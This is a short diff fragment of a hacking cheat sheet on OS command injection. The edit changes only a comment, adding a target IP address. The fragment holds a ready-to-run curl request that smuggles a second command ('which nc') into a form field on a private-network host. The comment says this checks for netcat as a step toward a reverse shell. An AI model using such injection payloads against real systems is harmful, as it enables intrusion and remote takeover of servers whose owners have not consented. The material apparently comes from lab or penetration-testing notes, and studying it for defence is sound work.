caderob/hacker-cheatsheet/Common Web Application Attacks/Command Injection/OS Command Injection.md

 >stanley
 ># =====================================
 >
-># Check if 'nc' (netcat) is installed on the target system, which is required for reverse shell
+># Check if 'nc' (netcat) is installed on the target system, which is required for reverse shell (Target: 192.168.110.16)
 >curl -X POST --data 'Archive=git%3Bwhich%20nc' http://192.168.110.16:80/archive
 >
 ># ========== Expected Result ==========